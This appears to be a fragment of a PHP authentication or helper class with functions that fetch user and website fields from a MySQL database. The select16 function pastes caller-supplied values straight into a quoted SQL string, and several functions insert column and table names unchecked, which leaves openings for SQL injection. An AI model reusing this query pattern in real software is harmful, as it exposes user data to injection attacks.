        return $res;
    }
    function Get($val)
    {
        global $conn, $uid;
        $sqlstr = "SELECT $val FROM users WHERE uid = ? ORDER BY id DESC LIMIT 1";
        $stmt = $conn->prepare($sqlstr);
        $stmt->bind_param("s", $uid);
        $stmt->execute();
        $result = $stmt->get_result();
        $x = $result->num_rows;
        if ($x > 0) {
            while ($row = $result->fetch_assoc()) {
                $res = $row[$val];
            }
        } else {
            $res = 0;
        }
        return $res;
    }



    function Get2($val, $user)
    {
        global $conn;
        $sqlstr = "SELECT $val FROM users WHERE uid = ? ORDER BY id DESC LIMIT 1";
        $stmt = $conn->prepare($sqlstr);
        $stmt->bind_param("s", $user);
        $stmt->execute();
        $result = $stmt->get_result();
        $x = $result->num_rows;
        if ($x > 0) {
            while ($row = $result->fetch_assoc()) {
                $res = $row[$val];
            }
        } else {
            $res = 0;
        }
        return $res;
    }
    function Web($val)
    {
        global $conn, $uid;
        $sqlstr = "SELECT $val FROM website_details";
        $stmt = $conn->prepare($sqlstr);
        $stmt->execute();
        $result = $stmt->get_result();
        $x = $result->num_rows;
        if ($x > 0) {
            while ($row = $result->fetch_assoc()) {
                $res = $row[$val];
            }
        } else {
            $res = 0;
        }
        return $res;
    }
    function select16($val, $table, $col, $val2, $col2, $val3)
    {
        global $conn;
        $sqlstr = "SELECT $val FROM $table WHERE $col = '$val2' AND $col2 = '$val3' ORDER BY id DESC LIMIT 1";
        $stmt = $conn->prepare($sqlstr);
        $stmt->execute();
        $result = $stmt->get_result();
        $x = $result->num_rows;
        if ($x > 0) {
            while ($row = $result->fetch_assoc()) {
                $res = $row[$val];
            }
        } else {
            $res = 0;
        }
        return $res;
    }
    function select12($val, $table)
    {
        global $conn;
        $sqlstr = "SELECT $val FROM $table";
        $stmt = $conn->prepare($sqlstr);
        $stmt->execute();
        $result = $stmt->get_result();
        $x = $result->num_rows;
        if ($x > 0) {
            while ($row = $result->fetch_assoc()) {
                $res = $row[$val];
            }
        } else {
            $res = 0;
        }
        return $res;
    }
}
$auth = new Auth;
$wn = $auth->select12('name', 'website_details');
$asset_v = 1.0;
